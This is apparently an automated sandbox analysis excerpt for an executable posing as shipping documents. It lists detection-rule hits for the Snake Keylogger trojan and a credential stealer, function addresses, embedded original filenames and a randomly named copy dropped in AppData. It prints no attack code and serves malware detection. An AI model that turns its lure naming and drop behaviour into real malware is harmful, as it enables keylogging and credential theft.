Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_00CA2448	0_2_00CA2448
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04460D9E	0_2_04460D9E
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446EE78	0_2_0446EE78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044607C8	0_2_044607C8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446D788	0_2_0446D788
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446F3C8	0_2_0446F3C8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04464C18	0_2_04464C18
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04464C28	0_2_04464C28
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044654C8	0_2_044654C8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044654D8	0_2_044654D8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04468491	0_2_04468491
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044684A0	0_2_044684A0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04468D40	0_2_04468D40
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04468D50	0_2_04468D50
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446BD6A	0_2_0446BD6A
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446BD78	0_2_0446BD78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465D78	0_2_04465D78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446DD07	0_2_0446DD07
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446DD18	0_2_0446DD18
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446E5C8	0_2_0446E5C8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044695F1	0_2_044695F1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465D88	0_2_04465D88
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446E5B9	0_2_0446E5B9
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446EE68	0_2_0446EE68
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469600	0_2_04469600
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446C61A	0_2_0446C61A
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446C628	0_2_0446C628
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466629	0_2_04466629
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466638	0_2_04466638
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446CEC8	0_2_0446CEC8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446CED8	0_2_0446CED8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466ED8	0_2_04466ED8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466EE8	0_2_04466EE8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469EA1	0_2_04469EA1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469EB0	0_2_04469EB0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446A751	0_2_0446A751
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446A760	0_2_0446A760
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446D778	0_2_0446D778
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04463F0F	0_2_04463F0F
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04463F20	0_2_04463F20
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044647C0	0_2_044647C0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044647D0	0_2_044647D0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467788	0_2_04467788
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467798	0_2_04467798
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044607B8	0_2_044607B8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04460040	0_2_04460040
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04468048	0_2_04468048
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465070	0_2_04465070
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04460006	0_2_04460006
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04468038	0_2_04468038
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044688E9	0_2_044688E9
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044688F8	0_2_044688F8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465080	0_2_04465080
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446E160	0_2_0446E160
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446E170	0_2_0446E170
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446B910	0_2_0446B910
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465922	0_2_04465922
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446B920	0_2_0446B920
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04465930	0_2_04465930
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446C1C0	0_2_0446C1C0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446C1D0	0_2_0446C1D0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044661D0	0_2_044661D0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044661E0	0_2_044661E0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469198	0_2_04469198
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044691A8	0_2_044691A8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469A48	0_2_04469A48
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04469A58	0_2_04469A58
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446CA72	0_2_0446CA72
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446EA12	0_2_0446EA12
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446EA20	0_2_0446EA20
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446A2F9	0_2_0446A2F9
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446CA80	0_2_0446CA80
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466A81	0_2_04466A81
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04466A90	0_2_04466A90
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467340	0_2_04467340
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04464368	0_2_04464368
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04464378	0_2_04464378
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446A308	0_2_0446A308
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446D321	0_2_0446D321
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446D330	0_2_0446D330
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467330	0_2_04467330
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467BE1	0_2_04467BE1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04467BF0	0_2_04467BF0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0446ABB8	0_2_0446ABB8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D8C38	0_2_044D8C38
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DA0F0	0_2_044DA0F0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DB4A2	0_2_044DB4A2
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D8558	0_2_044D8558
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DC9AA	0_2_044DC9AA
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7E70	0_2_044D7E70
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D9A08	0_2_044D9A08
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D9320	0_2_044D9320
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DA7D8	0_2_044DA7D8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D4798	0_2_044D4798
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D0006	0_2_044D0006
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D8C27	0_2_044D8C27
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DA0E0	0_2_044DA0E0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D8548	0_2_044D8548
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D0540	0_2_044D0540
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7118	0_2_044D7118
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7128	0_2_044D7128
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D99F8	0_2_044D99F8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D5DFA	0_2_044D5DFA
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7E68	0_2_044D7E68
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D5EC8	0_2_044D5EC8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7AF8	0_2_044D7AF8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D7AF6	0_2_044D7AF6
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D02B8	0_2_044D02B8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D5EBA	0_2_044D5EBA
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044D9311	0_2_044D9311
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DA7C9	0_2_044DA7C9
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04B12438	0_2_04B12438
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04B12429	0_2_04B12429
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04B11A78	0_2_04B11A78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A9EC70	0_2_06A9EC70
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A9D22A	0_2_06A9D22A
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A934E0	0_2_06A934E0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A94D20	0_2_06A94D20
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A930A8	0_2_06A930A8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A93098	0_2_06A93098
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A93918	0_2_06A93918
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A95158	0_2_06A95158
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D8710	0_2_073D8710
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073DB7F8	0_2_073DB7F8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D13E4	0_2_073D13E4
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D8700	0_2_073D8700
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073DB7E9	0_2_073DB7E9
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D8428	0_2_073D8428
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D8418	0_2_073D8418
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D13DC	0_2_073D13DC
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073DAC48	0_2_073DAC48
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D1A29	0_2_073D1A29
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A159A18	0_2_0A159A18
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154A38	0_2_0A154A38
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A1552A8	0_2_0A1552A8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A159332	0_2_0A159332
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A15C3C5	0_2_0A15C3C5
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A156918	0_2_0A156918
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154768	0_2_0A154768
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154FD8	0_2_0A154FD8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A157FE1	0_2_0A157FE1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A158C52	0_2_0A158C52
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154498	0_2_0A154498
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154D08	0_2_0A154D08
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A151D40	0_2_0A151D40
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A153D60	0_2_0A153D60
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154A28	0_2_0A154A28
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A15529A	0_2_0A15529A
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A1542CC	0_2_0A1542CC
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A156908	0_2_0A156908
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154762	0_2_0A154762
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154FC8	0_2_0A154FC8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A154CF7	0_2_0A154CF7
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A1574EF	0_2_0A1574EF
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A157500	0_2_0A157500
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078CB7F8	8_2_078CB7F8
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C8710	8_2_078C8710
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C13E4	8_2_078C13E4
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078CB7E9	8_2_078CB7E9
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C8700	8_2_078C8700
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C1688	8_2_078C1688
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C8418	8_2_078C8418
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C8428	8_2_078C8428
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078CAC48	8_2_078CAC48
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C1A29	8_2_078C1A29
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A54D20	8_2_07A54D20
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A534E0	8_2_07A534E0
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A53918	8_2_07A53918
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A55158	8_2_07A55158
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A530A8	8_2_07A530A8
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A5309B	8_2_07A5309B

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000034AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4529574732.000000000091E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000000.2067606813.00000000001E0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFDVL.exe@ vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Binary or memory string: OriginalFilenameFDVL.exe@ vs Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
